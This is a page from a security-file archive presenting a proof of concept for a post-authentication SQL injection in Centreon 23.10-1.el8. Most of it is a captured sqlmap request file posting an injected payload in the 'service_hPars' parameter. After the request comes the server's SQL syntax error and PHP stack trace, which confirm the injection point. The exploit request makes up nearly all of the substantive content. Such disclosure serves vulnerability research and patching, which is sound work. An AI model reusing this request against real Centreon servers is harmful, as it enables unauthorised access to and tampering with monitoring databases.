Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Centreon 23.10-1.el8 SQL Injection[6]
- Authored by Cody Sixteen[7] | Site code610.blogspot.com[8]
-
Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.
- SHA-256 |
ccd137a9553629c65cb1fcc131008c98cf86b7038c922afa5586765db2092434
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
;; Postauth SQL Injection in Centreon 23.10-1.el8
;; by code610
;;
;; found : 05.03.2024
;; version: centreon-vbox-vm-23_10-1.el8.zip
;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html
;;
;; sqlmap request.txt
POST /centreon/main.get.php?p=60201 HTTP/1.1
Host: 192.168.56.156
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 2529
Origin: http://192.168.56.156
Connection: keep-alive
Referer: http://192.168.56.156/centreon/main.get.php?p=60201&o=a
Cookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avh
Upgrade-Insecure-Requests: 1
service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134¯oInput%5B0%5D=MODE¯oValue%5B0%5D=connection-time¯oFrom%5B0%5D=fromTpl¯oTplValue_0=connection-time¯oOriginalName_0=¯oTplValToDisplay_0=1¯oDescription_0=¯oTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=¯oInput%5B1%5D=WARNING¯oValue%5B1%5D=1000¯oFrom%5B1%5D=fromTpl¯oTplValue_1=1000¯oOriginalName_1=¯oTplValToDisplay_1=1¯oDescription_1=¯oTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=¯oInput%5B2%5D=CRITICAL¯oValue%5B2%5D=5000¯oFrom%5B2%5D=fromTpl¯oTplValue_2=5000¯oOriginalName_2=¯oTplValToDisplay_2=1¯oDescription_2=¯oTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save¯oFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1¢reon_token=0e87a8f24318f5221765b62c09cb10bf
;; ---
;; init response:
<a href="/main.php?p=60201"
class="pathWay">Services by host</a>
</div>
SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br />
<b>Fatal error</b>: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311
Stack trace:
#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()
#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()
#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()
#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()
#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()
#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()
#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')
#7 /usr/share/centreon/www/main.get.php(304): include_once('...')
#8 {main}
thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />
;; ---
;; More:
;; https://code610.blogspot.com
;; https://twitter.com/CodySixteen
;;
;; cheers
;;
File Tags
- ActiveX[19] (933)
- Advisory[20] (84,776)
- Arbitrary[21] (16,652)
- BBS[22] (2,859)
- Bypass[23] (1,827)
- CGI[24] (1,032)
- Code Execution[25] (7,633)
- Conference[26] (689)
- Cracker[27] (844)
- CSRF[28] (3,373)
- DoS[29] (24,546)
- Encryption[30] (2,383)
- Exploit[31] (52,816)
- File Inclusion[32] (4,253)
- File Upload[33] (986)
- Firewall[34] (822)
- Info Disclosure[35] (2,849)
- Intrusion Detection[36] (906)
- Java[37] (3,118)
- JavaScript[38] (890)
- Kernel[39] (7,009)
- Local[40] (14,712)
- Magazine[41] (586)
- Overflow[42] (13,035)
- Perl[43] (1,430)
- PHP[44] (5,199)
- Proof of Concept[45] (2,368)
- Protocol[46] (3,695)
- Python[47] (1,599)
- Remote[48] (31,420)
- Root[49] (3,618)
- Rootkit[50] (523)
- Ruby[51] (619)
- Scanner[52] (1,650)
- Security Tool[53] (7,980)
- Shell[54] (3,252)
- Shellcode[55] (1,217)
- Sniffer[56] (900)
- Spoof[57] (2,258)
- SQL Injection[58] (16,538)
- TCP[59] (2,423)
- Trojan[60] (689)
- UDP[61] (897)
- Virus[62] (668)
- Vulnerability[63] (32,579)
- Web[64] (9,872)
- Whitepaper[65] (3,773)
- x86[66] (967)
- XSS[67] (18,174)
- Other[68]
File Archives
- April 2024[69]
- March 2024[70]
- February 2024[71]
- January 2024[72]
- December 2023[73]
- November 2023[74]
- October 2023[75]
- September 2023[76]
- August 2023[77]
- July 2023[78]
- June 2023[79]
- May 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,078)
- BSD[84] (376)
- CentOS[85] (58)
- Cisco[86] (1,927)
- Debian[87] (7,009)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,467)
- HPUX[91] (880)
- iOS[92] (373)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (49,174)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (488)
- RedHat[101] (15,460)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,433)
- UNIX[106] (9,390)
- UnixWare[107] (187)
- Windows[108] (6,648)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]